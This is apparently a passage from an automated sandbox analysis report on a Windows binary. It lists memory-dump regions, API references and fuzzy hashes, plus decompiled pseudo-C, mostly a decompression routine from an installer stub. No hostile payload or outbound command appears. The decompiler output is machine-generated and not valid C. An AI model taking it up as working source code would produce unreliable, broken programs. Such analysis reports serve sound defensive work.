                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 123533781-2935972921
                                          • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                          • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                          • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                          • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 1000F006
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 1000F00F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 994bc7c316b827b003faaf09e58e97cf16d3ec543e89b8db0b1006eb23b57c03
                                          • Instruction ID: 5030dc23641c71159e9771395754a92d4456f8d54d63a5637adc76bae9f1ee9b
                                          • Opcode Fuzzy Hash: 994bc7c316b827b003faaf09e58e97cf16d3ec543e89b8db0b1006eb23b57c03
                                          • Instruction Fuzzy Hash: E6B09232044258EBEA022BE1DC49B983FA8EB0A762F008010F60D44060CB729594AAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E00402630(char __ebx, char* __edi, char* __esi) {
                                          				void* _t19;
                                          
                                          				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                                          					E00405889(__edi, _t6);
                                          					_push(_t19 - 0x178);
                                          					_push(__esi);
                                          					E0040592B();
                                          				} else {
                                          					 *__edi = __ebx;
                                          					 *__esi = __ebx;
                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                          				}
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
                                          				return 0;
                                          			}





                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                          • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                          • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                          • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: cf1c5a0dcfeb6e63cb25c33ea0a670466eff0bab16aa7ee488cd36ac7b91e0c5
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: 84C175322091930AEB4DD67D843453FBAE2DB926F131707AEE8B6CB1D8EE20D564D520
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 04b93e2ad820f54a838cf396598bd4dcb0369557c165c582704f5abea7fcec7b
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: DDC152322091934AEB5DD67D843453FBAE29F926F131707AEE4B6CB1D9EE20C524D620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E00406043(signed int __ebx, signed int* __esi) {
                                          				signed int _t396;
                                          				signed int _t425;
                                          				signed int _t442;
                                          				signed int _t443;
                                          				signed int* _t446;
                                          				void* _t448;
                                          
                                          				L0:
                                          				while(1) {
                                          					L0:
                                          					_t446 = __esi;
                                          					_t425 = __ebx;
                                          					if( *(_t448 - 0x34) == 0) {
                                          						break;
                                          					}
                                          					L55:
                                          					__eax =  *(__ebp - 0x38);
                                          					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          					__ecx = __ebx;
                                          					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          					__ebx = __ebx + 8;
                                          					while(1) {
                                          						L56:
                                          						if(__ebx < 0xe) {
                                          							goto L0;
                                          						}
                                          						L57:
                                          						__eax =  *(__ebp - 0x40);
                                          						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                          						__ecx = __eax;
                                          						__esi[1] = __eax;
                                          						__ecx = __eax & 0x0000001f;
                                          						if(__cl > 0x1d) {
                                          							L9:
                                          							_t443 = _t442 | 0xffffffff;
                                          							 *_t446 = 0x11;
                                          							L10:
                                          							_t446[0x147] =  *(_t448 - 0x40);
                                          							_t446[0x146] = _t425;
                                          							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                          							L11:
                                          							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                          							_t446[0x26ea] =  *(_t448 - 0x30);
                                          							E004067B2( *(_t448 + 8));
                                          							return _t443;
                                          						}
                                          						L58:
                                          						__eax = __eax & 0x000003e0;
                                          						if(__eax > 0x3a0) {
                                          							goto L9;
                                          						}
                                          						L59:
                                          						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                          						__ebx = __ebx - 0xe;
                                          						_t94 =  &(__esi[2]);
                                          						 *_t94 = __esi[2] & 0x00000000;
                                          						 *__esi = 0xc;
                                          						while(1) {
                                          							L60:
                                          							__esi[1] = __esi[1] >> 0xa;
                                          							__eax = (__esi[1] >> 0xa) + 4;
                                          							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                          								goto L68;
                                          							}
                                          							L61:
                                          							while(1) {
                                          								L64:
                                          								if(__ebx >= 3) {
                                          									break;
                                          								}
                                          								L62:
                                          								if( *(__ebp - 0x34) == 0) {
                                          									goto L182;
                                          								}
                                          								L63:
                                          								__eax =  *(__ebp - 0x38);
                                          								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          								__ecx = __ebx;
                                          								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          								__ebx = __ebx + 8;
                                          							}
                                          							L65:
                                          							__ecx = __esi[2];
                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                          							__ebx = __ebx - 3;
                                          							_t108 = __ecx + 0x407374; // 0x121110
                                          							__ecx =  *_t108;
                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                          							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                          							__ecx = __esi[1];
                                          							__esi[2] = __esi[2] + 1;
                                          							__eax = __esi[2];
                                          							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                          							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                          								goto L64;
                                          							}
                                          							L66:
                                          							while(1) {
                                          								L68:
                                          								if(__esi[2] >= 0x13) {
                                          									break;
                                          								}
                                          								L67:
                                          								_t119 = __esi[2] + 0x407374; // 0x4000300
                                          								__eax =  *_t119;
                                          								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                          								_t126 =  &(__esi[2]);
                                          								 *_t126 = __esi[2] + 1;
                                          							}
                                          							L69:
                                          							__ecx = __ebp - 8;
                                          							__edi =  &(__esi[0x143]);
                                          							 &(__esi[0x148]) =  &(__esi[0x144]);
                                          							__eax = 0;
                                          							 *(__ebp - 8) = 0;
                                          							__eax =  &(__esi[3]);
                                          							 *__edi = 7;
                                          							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                          							if(__eax != 0) {
                                          								L72:
                                          								 *__esi = 0x11;
                                          								while(1) {
                                          									L180:
                                          									_t396 =  *_t446;
                                          									if(_t396 > 0xf) {
                                          										break;
                                          									}
                                          									L1:
                                          									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
                                          										case 0:
                                          											L101:
                                          											__eax = __esi[4] & 0x000000ff;
                                          											__esi[3] = __esi[4] & 0x000000ff;
                                          											__eax = __esi[5];
                                          											__esi[2] = __esi[5];
                                          											 *__esi = 1;
                                          											goto L102;
                                          										case 1:
                                          											L102:
                                          											__eax = __esi[3];
                                          											while(1) {
                                          												L105:
                                          												__eflags = __ebx - __eax;
                                          												if(__ebx >= __eax) {
                                          													break;
                                          												}
                                          												L103:
                                          												__eflags =  *(__ebp - 0x34);
                                          												if( *(__ebp - 0x34) == 0) {
                                          													goto L182;
                                          												}
                                          												L104:
                                          												__ecx =  *(__ebp - 0x38);
                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                          												__ecx = __ebx;
                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          												__ebx = __ebx + 8;
                                          												__eflags = __ebx;
                                          											}
                                          											L106:
                                          											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                          											__eax = __eax &  *(__ebp - 0x40);
                                          											__ecx = __esi[2];
                                          											__eax = __esi[2] + __eax * 4;
                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                          											__ecx =  *__eax & 0x000000ff;
                                          											__eflags = __ecx;
                                          											if(__ecx != 0) {
                                          												L108:
                                          												__eflags = __cl & 0x00000010;
                                          												if((__cl & 0x00000010) == 0) {
                                          													L110:
                                          													__eflags = __cl & 0x00000040;
                                          													if((__cl & 0x00000040) == 0) {
                                          														goto L125;
                                          													}
                                          													L111:
                                          													__eflags = __cl & 0x00000020;
                                          													if((__cl & 0x00000020) == 0) {
                                          														goto L9;
                                          													}
                                          													L112:
                                          													 *__esi = 7;
                                          													goto L180;
                                          												}
                                          												L109:
                                          												__esi[2] = __ecx;
                                          												__esi[1] = __eax;
                                          												 *__esi = 2;
                                          												goto L180;
                                          											}
                                          											L107:
                                          											__esi[2] = __eax;
                                          											 *__esi = 6;
                                          											goto L180;
                                          										case 2:
                                          											L113:
                                          											__eax = __esi[2];
                                          											while(1) {
                                          												L116:
                                          												__eflags = __ebx - __eax;
                                          												if(__ebx >= __eax) {
                                          													break;
                                          												}
                                          												L114:
                                          												__eflags =  *(__ebp - 0x34);
                                          												if( *(__ebp - 0x34) == 0) {
                                          													goto L182;
                                          												}
                                          												L115:
                                          												__ecx =  *(__ebp - 0x38);
                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                          												__ecx = __ebx;
                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          												__ebx = __ebx + 8;
                                          												__eflags = __ebx;
                                          											}
                                          											L117:
                                          											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                          											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                          											__ecx = __eax;
                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                          											__ebx = __ebx - __eax;
                                          											__eflags = __ebx;
                                          											__eax = __esi[4] & 0x000000ff;
                                          											__esi[3] = __esi[4] & 0x000000ff;
                                          											__eax = __esi[6];
                                          											__esi[2] = __esi[6];
                                          											 *__esi = 3;
                                          											goto L118;
                                          										case 3:
                                          											L118:
                                          											__eax = __esi[3];
                                          											while(1) {
                                          												L121:
                                          												__eflags = __ebx - __eax;
                                          												if(__ebx >= __eax) {
                                          													break;
                                          												}
                                          												L119:
                                          												__eflags =  *(__ebp - 0x34);
                                          												if( *(__ebp - 0x34) == 0) {
                                          													goto L182;
                                          												}
                                          												L120:
                                          												__ecx =  *(__ebp - 0x38);
                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                          												__ecx = __ebx;
                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          												__ebx = __ebx + 8;
                                          												__eflags = __ebx;
                                          											}
                                          											L122:
                                          											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                          											__eax = __eax &  *(__ebp - 0x40);
                                          											__ecx = __esi[2];
                                          											__eax = __esi[2] + __eax * 4;
                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                          											__ecx =  *__eax & 0x000000ff;
                                          											__eflags = __cl & 0x00000010;
                                          											if((__cl & 0x00000010) == 0) {
                                          												L124:
                                          												__eflags = __cl & 0x00000040;
                                          												if((__cl & 0x00000040) != 0) {
                                          													goto L9;
                                          												}
                                          												L125:
                                          												__esi[3] = __ecx;
                                          												__ecx =  *(__eax + 2) & 0x0000ffff;
                                          												__esi[2] = __eax;
                                          												goto L180;
                                          											}
                                          											L123:
                                          											__esi[2] = __ecx;
                                          											__esi[3] = __eax;
                                          											 *__esi = 4;
                                          											goto L180;
                                          										case 4:
                                          											L126:
                                          											__eax = __esi[2];
                                          											while(1) {
                                          												L129:
                                          												__eflags = __ebx - __eax;
                                          												if(__ebx >= __eax) {
                                          													break;
                                          												}
                                          												L127:
                                          												__eflags =  *(__ebp - 0x34);
                                          												if( *(__ebp - 0x34) == 0) {
                                          													goto L182;
                                          												}
                                          												L128:
                                          												__ecx =  *(__ebp - 0x38);
                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                          												__ecx = __ebx;
                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          												__ebx = __ebx + 8;
                                          												__eflags = __ebx;
                                          											}
                                          											L130:
                                          											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                          											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                          											__ecx = __eax;
                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                          											__ebx = __ebx - __eax;
                                          											__eflags = __ebx;
                                          											 *__esi = 5;
                                          											goto L131;
                                          										case 5:
                                          											L131:
                                          											__eax =  *(__ebp - 0x30);
                                          											__edx = __esi[3];
                                          											__eax = __eax - __esi;
                                          											__ecx = __eax - __esi - 0x1ba0;
                                          											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                          											if(__eax - __esi - 0x1ba0 >= __edx) {
                                          												__ecx = __eax;
                                          												__ecx = __eax - __edx;
                                          												__eflags = __ecx;
                                          											} else {
                                          												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                          												__ecx = __esi[0x26e8] - __edx - __esi;
                                          												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                          											}
                                          											__eflags = __esi[1];
                                          											 *(__ebp - 0x20) = __ecx;
                                          											if(__esi[1] != 0) {
                                          												L135:
                                          												__edi =  *(__ebp - 0x2c);
                                          												do {
                                          													L136:
                                          													__eflags = __edi;
                                          													if(__edi != 0) {
                                          														goto L152;
                                          													}
                                          													L137:
                                          													__edi = __esi[0x26e8];
                                          													__eflags = __eax - __edi;
                                          													if(__eax != __edi) {
                                          														L143:
                                          														__esi[0x26ea] = __eax;
                                          														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                          														__eax = __esi[0x26ea];
                                          														__ecx = __esi[0x26e9];
                                          														__eflags = __eax - __ecx;
                                          														 *(__ebp - 0x30) = __eax;
                                          														if(__eax >= __ecx) {
                                          															__edi = __esi[0x26e8];
                                          															__edi = __esi[0x26e8] - __eax;
                                          															__eflags = __edi;
                                          														} else {
                                          															__ecx = __ecx - __eax;
                                          															__edi = __ecx - __eax - 1;
                                          														}
                                          														__edx = __esi[0x26e8];
                                          														__eflags = __eax - __edx;
                                          														 *(__ebp - 8) = __edx;
                                          														if(__eax == __edx) {
                                          															__edx =  &(__esi[0x6e8]);
                                          															__eflags = __ecx - __edx;
                                          															if(__ecx != __edx) {
                                          																__eax = __edx;
                                          																__eflags = __eax - __ecx;
                                          																 *(__ebp - 0x30) = __eax;
                                          																if(__eax >= __ecx) {
                                          																	__edi =  *(__ebp - 8);
                                          																	__edi =  *(__ebp - 8) - __eax;
                                          																	__eflags = __edi;
                                          																} else {
                                          																	__ecx = __ecx - __eax;
                                          																	__edi = __ecx;
                                          																}
                                          															}
                                          														}
                                          														__eflags = __edi;
                                          														if(__edi == 0) {
                                          															goto L183;
                                          														} else {
                                          															goto L152;
                                          														}
                                          													}
                                          													L138:
                                          													__ecx = __esi[0x26e9];
                                          													__edx =  &(__esi[0x6e8]);
                                          													__eflags = __ecx - __edx;
                                          													if(__ecx == __edx) {
                                          														goto L143;
                                          													}
                                          													L139:
                                          													__eax = __edx;
                                          													__eflags = __eax - __ecx;
                                          													if(__eax >= __ecx) {
                                          														__edi = __edi - __eax;
                                          														__eflags = __edi;
                                          													} else {
                                          														__ecx = __ecx - __eax;
                                          														__edi = __ecx;
                                          													}
                                          													__eflags = __edi;
                                          													if(__edi == 0) {
                                          														goto L143;
                                          													}
                                          													L152:
                                          													__ecx =  *(__ebp - 0x20);
                                          													 *__eax =  *__ecx;
                                          													__eax = __eax + 1;
                                          													__ecx = __ecx + 1;
                                          													__edi = __edi - 1;
                                          													__eflags = __ecx - __esi[0x26e8];
                                          													 *(__ebp - 0x30) = __eax;
                                          													 *(__ebp - 0x20) = __ecx;
                                          													 *(__ebp - 0x2c) = __edi;
                                          													if(__ecx == __esi[0x26e8]) {
                                          														__ecx =  &(__esi[0x6e8]);
                                          														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                          													}
                                          													_t357 =  &(__esi[1]);
                                          													 *_t357 = __esi[1] - 1;
                                          													__eflags =  *_t357;
                                          												} while ( *_t357 != 0);
                                          											}
                                          											goto L23;
                                          										case 6:
                                          											L156:
                                          											__eax =  *(__ebp - 0x2c);
                                          											__edi =  *(__ebp - 0x30);
                                          											__eflags = __eax;
                                          											if(__eax != 0) {
                                          												L172:
                                          												__cl = __esi[2];
                                          												 *__edi = __cl;
                                          												__edi = __edi + 1;
                                          												__eax = __eax - 1;
                                          												 *(__ebp - 0x30) = __edi;
                                          												 *(__ebp - 0x2c) = __eax;
                                          												goto L23;
                                          											}
                                          											L157:
                                          											__ecx = __esi[0x26e8];
                                          											__eflags = __edi - __ecx;
                                          											if(__edi != __ecx) {
                                          												L163:
                                          												__esi[0x26ea] = __edi;
                                          												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                          												__edi = __esi[0x26ea];
                                          												__ecx = __esi[0x26e9];
                                          												__eflags = __edi - __ecx;
                                          												 *(__ebp - 0x30) = __edi;
                                          												if(__edi >= __ecx) {
                                          													__eax = __esi[0x26e8];
                                          													__eax = __esi[0x26e8] - __edi;
                                          													__eflags = __eax;
                                          												} else {
                                          													__ecx = __ecx - __edi;
                                          													__eax = __ecx - __edi - 1;
                                          												}
                                          												__edx = __esi[0x26e8];
                                          												__eflags = __edi - __edx;
                                          												 *(__ebp - 8) = __edx;
                                          												if(__edi == __edx) {
                                          													__edx =  &(__esi[0x6e8]);
                                          													__eflags = __ecx - __edx;
                                          													if(__ecx != __edx) {
                                          														__edi = __edx;
                                          														__eflags = __edi - __ecx;
                                          														 *(__ebp - 0x30) = __edi;
                                          														if(__edi >= __ecx) {
                                          															__eax =  *(__ebp - 8);
                                          															__eax =  *(__ebp - 8) - __edi;
                                          															__eflags = __eax;
                                          														} else {
                                          															__ecx = __ecx - __edi;
                                          															__eax = __ecx;
                                          														}
                                          													}
                                          												}
                                          												__eflags = __eax;
                                          												if(__eax == 0) {
                                          													goto L183;
                                          												} else {
                                          													goto L172;
                                          												}
                                          											}
                                          											L158:
                                          											__eax = __esi[0x26e9];
                                          											__edx =  &(__esi[0x6e8]);
                                          											__eflags = __eax - __edx;
                                          											if(__eax == __edx) {
                                          												goto L163;
                                          											}
                                          											L159:
                                          											__edi = __edx;
                                          											__eflags = __edi - __eax;
                                          											if(__edi >= __eax) {
                                          												__ecx = __ecx - __edi;
                                          												__eflags = __ecx;
                                          												__eax = __ecx;
                                          											} else {
                                          												__eax = __eax - __edi;
                                          												__eax = __eax - 1;
                                          											}
                                          											__eflags = __eax;
                                          											if(__eax != 0) {
                                          												goto L172;
                                          											} else {
                                          												goto L163;
                                          											}
                                          										case 7:
                                          											L173:
                                          											__eflags = __ebx - 7;
                                          											if(__ebx > 7) {
                                          												__ebx = __ebx - 8;
                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                          												_t380 = __ebp - 0x38;
                                          												 *_t380 =  *(__ebp - 0x38) - 1;
                                          												__eflags =  *_t380;
                                          											}
                                          											goto L175;
                                          										case 8:
                                          											L4:
                                          											while(_t425 < 3) {
                                          												if( *(_t448 - 0x34) == 0) {
                                          													goto L182;
                                          												} else {
                                          													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                          													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                          													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                          													_t425 = _t425 + 8;
                                          													continue;
                                          												}
                                          											}
                                          											_t425 = _t425 - 3;
                                          											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                          											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                          											asm("sbb ecx, ecx");
                                          											_t408 = _t406 >> 1;
                                          											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                          											if(_t408 == 0) {
                                          												L24:
                                          												 *_t446 = 9;
                                          												_t436 = _t425 & 0x00000007;
                                          												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                          												_t425 = _t425 - _t436;
                                          												goto L180;
                                          											}
                                          											L6:
                                          											_t411 = _t408 - 1;
                                          											if(_t411 == 0) {
                                          												L13:
                                          												__eflags =  *0x42daf0;
                                          												if( *0x42daf0 != 0) {
                                          													L22:
                                          													_t412 =  *0x409364; // 0x9
                                          													_t446[4] = _t412;
                                          													_t413 =  *0x409368; // 0x5
                                          													_t446[4] = _t413;
                                          													_t414 =  *0x42c96c; // 0x0
                                          													_t446[5] = _t414;
                                          													_t415 =  *0x42c968; // 0x0
                                          													_t446[6] = _t415;
                                          													L23:
                                          													 *_t446 =  *_t446 & 0x00000000;
                                          													goto L180;
                                          												} else {
                                          													_t26 = _t448 - 8;
                                          													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                          													__eflags =  *_t26;
                                          													_t416 = 0x42c970;
                                          													goto L15;
                                          													L20:
                                          													 *_t416 = _t438;
                                          													_t416 = _t416 + 4;
                                          													__eflags = _t416 - 0x42cdf0;
                                          													if(_t416 < 0x42cdf0) {
                                          														L15:
                                          														__eflags = _t416 - 0x42cbac;
                                          														_t438 = 8;
                                          														if(_t416 > 0x42cbac) {
                                          															__eflags = _t416 - 0x42cd70;
                                          															if(_t416 >= 0x42cd70) {
                                          																__eflags = _t416 - 0x42cdd0;
                                          																if(_t416 < 0x42cdd0) {
                                          																	_t438 = 7;
                                          																}
                                          															} else {
                                          																_t438 = 9;
                                          															}
                                          														}
                                          														goto L20;
                                          													} else {
                                          														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
                                          														_push(0x1e);
                                          														_pop(_t440);
                                          														_push(5);
                                          														_pop(_t419);
                                          														memset(0x42c970, _t419, _t440 << 2);
                                          														_t450 = _t450 + 0xc;
                                          														_t442 = 0x42c970 + _t440;
                                          														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
                                          														 *0x42daf0 =  *0x42daf0 + 1;
                                          														__eflags =  *0x42daf0;
                                          														goto L22;
                                          													}
                                          												}
                                          											}
                                          											L7:
                                          											_t423 = _t411 - 1;
                                          											if(_t423 == 0) {
                                          												 *_t446 = 0xb;
                                          												goto L180;
                                          											}
                                          											L8:
                                          											if(_t423 != 1) {
                                          												goto L180;
                                          											}
                                          											goto L9;
                                          										case 9:
                                          											while(1) {
                                          												L27:
                                          												__eflags = __ebx - 0x10;
                                          												if(__ebx >= 0x10) {
                                          													break;
                                          												}
                                          												L25:
                                          												__eflags =  *(__ebp - 0x34);
                                          												if( *(__ebp - 0x34) == 0) {
                                          													goto L182;
                                          												}
                                          												L26:
                                          												__eax =  *(__ebp - 0x38);
                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          												__ecx = __ebx;
                                          												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
